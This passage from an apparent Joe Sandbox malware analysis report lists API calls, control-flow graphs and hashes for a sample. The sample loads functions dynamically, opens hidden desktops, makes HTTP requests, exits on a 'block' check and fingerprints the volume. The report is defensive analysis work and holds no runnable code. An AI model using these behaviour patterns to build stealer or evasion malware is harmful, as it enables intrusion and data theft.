                            • GetProcAddress.KERNEL32(70180000,01865348), ref: 00B27197
                            • GetProcAddress.KERNEL32(70180000,0187D160), ref: 00B271B0
                            • GetProcAddress.KERNEL32(70180000,0187D2B0), ref: 00B271C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 676b2415b0433f490d973d755c8e90a7ea38d6d03753d9cca01d977dd0d2b442
                            • Instruction ID: 267b2f72820dbcca82f9d115b736b0d35ff6a69b90adf729f3448e6e299046e1
                            • Opcode Fuzzy Hash: 676b2415b0433f490d973d755c8e90a7ea38d6d03753d9cca01d977dd0d2b442
                            • Instruction Fuzzy Hash: C56242B9A117009FD758DF65EDA8A26B7B9FB883413148919F956C3374DBB4A800EF30
                            APIs
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F1D5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F1F1
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F1FC
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F215
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F220
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F239
                            • lstrcpy.KERNEL32(00000000,00B34FA0), ref: 00B1F25E
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F28C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F2C0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F2F0
                            • lstrlen.KERNEL32(01865608), ref: 00B1F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 781479a5e0167e88777c7e8c4836de415c970ee234007f263a5274255f5dbf99
                            • Instruction ID: 14aeec10cca2944a4a313889752d19c788cf4d1c78f383954481a61d6e2a31c2
                            • Opcode Fuzzy Hash: 781479a5e0167e88777c7e8c4836de415c970ee234007f263a5274255f5dbf99
                            • Instruction Fuzzy Hash: 91A23E709017068FCB20DF69D958AAABBF5EF44314F5884B9E809DB3A1DB35DC86CB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20013
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B200BD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B200E1
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B200EC
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20110
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B2011B
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2013F
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B2015A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20189
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B20194
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B201C3
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B201CE
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20206
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B20250
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20288
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2059B
                            • lstrlen.KERNEL32(018654E8), ref: 00B205AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B205D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00B205E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2060E
                            • lstrlen.KERNEL32(0187EE70), ref: 00B20625
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00B20658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B20681
                            • lstrlen.KERNEL32(01865628), ref: 00B20698
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B206C9
                            • lstrcat.KERNEL32(00000000,?), ref: 00B206D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B20706
                            • lstrcpy.KERNEL32(00000000,018788C8), ref: 00B2074B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2077F
                            • lstrcpy.KERNEL32(00000000,0187EC90), ref: 00B207E7
                            • lstrcpy.KERNEL32(00000000,01878AB8), ref: 00B20858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00B208CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B20928
                            • lstrcpy.KERNEL32(00000000,01878C38), ref: 00B209F8
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B02528
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B0254E
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B02577
                            • lstrcpy.KERNEL32(00000000,01878B28), ref: 00B20ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B20B81
                            • lstrcpy.KERNEL32(00000000,01878B28), ref: 00B20D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: afba1c850382a596ca2f913b9396ad7e681534a5eab200a8d58b2caed7f22121
                            • Instruction ID: 1c94f2c7c07dfe7122a8379250687fe2527ed9156722c787acb4a76929d572d0
                            • Opcode Fuzzy Hash: afba1c850382a596ca2f913b9396ad7e681534a5eab200a8d58b2caed7f22121
                            • Instruction Fuzzy Hash: BEE24B70A053518FD724EF29D488B5ABBE1FF88314F5889ADE44D8B3A2DB31D845CB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 b06c40-b06c64 call b02930 2237 b06c75-b06c97 call b04bc0 2234->2237 2238 b06c66-b06c6b 2234->2238 2242 b06c99 2237->2242 2243 b06caa-b06cba call b02930 2237->2243 2238->2237 2239 b06c6d-b06c6f lstrcpy 2238->2239 2239->2237 2244 b06ca0-b06ca8 2242->2244 2247 b06cc8-b06cf5 InternetOpenA StrCmpCA 2243->2247 2248 b06cbc-b06cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 b06cf7 2247->2249 2250 b06cfa-b06cfc 2247->2250 2248->2247 2249->2250 2251 b06d02-b06d22 InternetConnectA 2250->2251 2252 b06ea8-b06ebb call b02930 2250->2252 2253 b06ea1-b06ea2 InternetCloseHandle 2251->2253 2254 b06d28-b06d5d HttpOpenRequestA 2251->2254 2261 b06ec9-b06ee0 call b02a20 * 2 2252->2261 2262 b06ebd-b06ebf 2252->2262 2253->2252 2256 b06d63-b06d65 2254->2256 2257 b06e94-b06e9e InternetCloseHandle 2254->2257 2259 b06d67-b06d77 InternetSetOptionA 2256->2259 2260 b06d7d-b06dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 b06dd4-b06de4 call b23d90 2260->2263 2264 b06daf-b06dd3 call b271e0 call b02a20 * 2 2260->2264 2262->2261 2265 b06ec1-b06ec3 lstrcpy 2262->2265 2263->2264 2275 b06de6-b06de8 2263->2275 2265->2261 2277 b06e8d-b06e8e InternetCloseHandle 2275->2277 2278 b06dee-b06e07 InternetReadFile 2275->2278 2277->2257 2278->2277 2279 b06e0d 2278->2279 2281 b06e10-b06e15 2279->2281 2281->2277 2283 b06e17-b06e3d call b27310 2281->2283 2286 b06e44-b06e51 call b02930 2283->2286 2287 b06e3f call b02a20 2283->2287 2291 b06e61-b06e8b call b02a20 InternetReadFile 2286->2291 2292 b06e53-b06e57 2286->2292 2287->2286 2291->2277 2291->2281 2292->2291 2293 b06e59-b06e5b lstrcpy 2292->2293 2293->2291
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06C6F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06CC2
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B06CD5
                            • StrCmpCA.SHLWAPI(?,0187F178), ref: 00B06CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,0187EE10,00000000,00000000,-00400100,00000000), ref: 00B06D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00B06D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00B06DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B06DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00B06E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00B06E8E
                            • InternetCloseHandle.WININET(?), ref: 00B06E98
                            • InternetCloseHandle.WININET(00000000), ref: 00B06EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B06EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: e98d8f23702e8777997bb3541f7c984b8855c7e310837ce140ea11f5c14da4d6
                            • Instruction ID: fc4de1b1df46adc70cd4cf7a49288f1623cf063053ac0904743308bbcb683a84
                            • Opcode Fuzzy Hash: e98d8f23702e8777997bb3541f7c984b8855c7e310837ce140ea11f5c14da4d6
                            • Instruction Fuzzy Hash: EE815075A41315ABEB20DFA4DC49BAEBBF8EF44700F1441A8F905E72C0DB70AD458BA0
                            APIs
                            • lstrlen.KERNEL32(01865608), ref: 00B1F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F47B
                            • lstrcpy.KERNEL32(00000000,01865608), ref: 00B1F4BB
                            • lstrcpy.KERNEL32(00000000,018788E8), ref: 00B1F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B1F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1F718
                            • lstrlen.KERNEL32(01878A68), ref: 00B1F746
                            • lstrcpy.KERNEL32(00000000,01878A68), ref: 00B1F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1FA32
                            • lstrlen.KERNEL32(018788B8), ref: 00B1FA60
                            • lstrcpy.KERNEL32(00000000,018788B8), ref: 00B1FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1FAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 47998fde45ddf094a6d447e3d19f030fbc4128c8d7c4eb054056030fac9b8b6f
                            • Instruction ID: 53c1ea1a9af490b363c45d33ba5f38b9854dc98435f32aaa0e90bdde5e88d58f
                            • Opcode Fuzzy Hash: 47998fde45ddf094a6d447e3d19f030fbc4128c8d7c4eb054056030fac9b8b6f
                            • Instruction Fuzzy Hash: 25F10770A01702CFDB24CF69D898AAAB7E5FF44314B5881BAD809DB3A1D775DC82CB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 b18ca0-b18cc4 StrCmpCA 2722 b18cc6-b18cc7 ExitProcess 2721->2722 2723 b18ccd-b18ce6 2721->2723 2725 b18ee2-b18eef call b02a20 2723->2725 2726 b18cec-b18cf1 2723->2726 2728 b18cf6-b18cf9 2726->2728 2730 b18ec3-b18edc 2728->2730 2731 b18cff 2728->2731 2730->2725 2769 b18cf3 2730->2769 2732 b18d30-b18d3f lstrlen 2731->2732 2733 b18e56-b18e64 StrCmpCA 2731->2733 2734 b18d5a-b18d69 lstrlen 2731->2734 2735 b18dbd-b18dcb StrCmpCA 2731->2735 2736 b18ddd-b18deb StrCmpCA 2731->2736 2737 b18dfd-b18e0b StrCmpCA 2731->2737 2738 b18e1d-b18e2b StrCmpCA 2731->2738 2739 b18e3d-b18e4b StrCmpCA 2731->2739 2740 b18d84-b18d92 StrCmpCA 2731->2740 2741 b18da4-b18db8 StrCmpCA 2731->2741 2742 b18d06-b18d15 lstrlen 2731->2742 2743 b18e88-b18e9a lstrlen 2731->2743 2744 b18e6f-b18e7d StrCmpCA 2731->2744 2748 b18d41-b18d46 call b02a20 2732->2748 2749 b18d49-b18d55 call b02930 2732->2749 2733->2730 2761 b18e66-b18e6d 2733->2761 2750 b18d73-b18d7f call b02930 2734->2750 2751 b18d6b-b18d70 call b02a20 2734->2751 2735->2730 2754 b18dd1-b18dd8 2735->2754 2736->2730 2755 b18df1-b18df8 2736->2755 2737->2730 2756 b18e11-b18e18 2737->2756 2738->2730 2757 b18e31-b18e38 2738->2757 2739->2730 2758 b18e4d-b18e54 2739->2758 2740->2730 2753 b18d98-b18d9f 2740->2753 2741->2730 2759 b18d17-b18d1c call b02a20 2742->2759 2760 b18d1f-b18d2b call b02930 2742->2760 2746 b18ea4-b18eb0 call b02930 2743->2746 2747 b18e9c-b18ea1 call b02a20 2743->2747 2744->2730 2745 b18e7f-b18e86 2744->2745 2745->2730 2779 b18eb3-b18eb5 2746->2779 2747->2746 2748->2749 2749->2779 2750->2779 2751->2750 2753->2730 2754->2730 2755->2730 2756->2730 2757->2730 2758->2730 2759->2760 2760->2779 2761->2730 2769->2728 2779->2730 2780 b18eb7-b18eb9 2779->2780 2780->2730 2781 b18ebb-b18ebd lstrcpy 2780->2781 2781->2730
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3f6630df1525520de12c673d03c3e0b07fa1a028baa3ea40a815c7b84e815511
                            • Instruction ID: 362018c74a3582c5e5a305a2c6a02176fb00971a3843dae2d4ba369d393238bd
                            • Opcode Fuzzy Hash: 3f6630df1525520de12c673d03c3e0b07fa1a028baa3ea40a815c7b84e815511
                            • Instruction Fuzzy Hash: EC516D72A04701DBC7209F75DD88ABBBBF4FF44700B9048ADE442D6650DBB8E9859B61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 b22740-b22783 GetWindowsDirectoryA 2783 b22785 2782->2783 2784 b2278c-b227ea GetVolumeInformationA 2782->2784 2783->2784 2785 b227ec-b227f2 2784->2785 2786 b227f4-b22807 2785->2786 2787 b22809-b22820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 b22822-b22824 2787->2788 2789 b22826-b22844 wsprintfA 2787->2789 2790 b2285b-b22872 call b271e0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00B2277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00B193B6,00000000,00000000,00000000,00000000), ref: 00B227AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22816
                            • wsprintfA.USER32 ref: 00B2283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
